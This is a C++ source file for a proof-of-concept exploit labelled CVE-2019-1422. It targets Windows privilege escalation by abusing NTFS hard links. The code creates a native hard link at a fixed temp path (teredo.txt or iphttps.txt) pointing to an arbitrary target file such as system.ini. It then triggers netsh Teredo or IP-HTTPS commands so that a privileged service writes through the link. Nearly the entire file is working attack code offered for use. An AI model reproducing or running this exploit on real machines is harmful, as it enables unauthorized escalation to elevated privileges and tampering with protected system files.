﻿// cve-2019-1422.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "stdafx.h"
#include "CommonUtils.h"
#include "ntimports.h"
#include "typed_buffer.h"
#include <tchar.h>
#include <wchar.h>
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <iostream>

#ifndef UNICODE  
typedef std::string String;
#else
typedef std::wstring String;
#endif

bool CheckFilePermissions(_TCHAR* target) {

	_tprintf(_T("[+] Checking File privileges of %s\n"), target);
	FILE *fp = _wfopen(target, TEXT("a"));
	if (fp == NULL) {
		if (errno == EACCES) {
			std::cerr << "[*] You don't have 'Modify/Write' privileges on this file ..." << std::endl;
			return false;
		}
		else {
			std::cerr << "[*] Something went wrong: " << strerror(errno) << std::endl;
			return false;
		}
	}
	else {
		printf("[*] You have 'Full Control' over this file!\n");
		return true;
	}
}

void CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
{
	std::wstring full_linkname = BuildFullPath(linkname, true);
	size_t len = full_linkname.size() * sizeof(WCHAR);

	typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));

	memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
	link_info->ReplaceIfExists = TRUE;
	link_info->FileNameLength = len;

	std::wstring full_targetname = BuildFullPath(targetname, true);

	HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
	if (hFile)
	{
		DEFINE_NTDLL(ZwSetInformationFile);
		IO_STATUS_BLOCK io_status = { 0 };

		NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
		CloseHandle(hFile);
	}
}


void teredo(_TCHAR* FilePath) {

	wprintf(L"[*] Create hard link to file %s \n", FilePath);
	CreateNativeHardlink(L"C:\\Windows\\temp\\teredo.txt", FilePath);
	Sleep(1000);
	std::cout << "[*] Query status...\n";
	system("netsh interface teredo show state");
}

void httpstunnel(_TCHAR* FilePath) {

	wprintf(L"[*] Create hard link to file %s \n", FilePath);
	CreateNativeHardlink(L"C:\\Windows\\temp\\iphttps.txt", FilePath);
	Sleep(1000);
	std::cout << "[*] Query status...\n";
	system("netsh interface httpstunnel show statistics");
}

int _tmain(int argc, _TCHAR* argv[])
{
	if (argc != 3) {
		wprintf(L"[*] Usage: %s 1 C:\\Windows\\system.ini\n[*] 1 teredo \n[*] 2 httpstunnel", argv[0]);
		return 0;
	}

	if (_wtoi(argv[1]) == 1) {
		teredo(argv[2]);
	}
	else {
		httpstunnel(argv[2]);
	}

	Sleep(2000);
	std::cout << "[*] Done.\n";
	//CheckFilePermissions(argv[2]);

	return 0;
}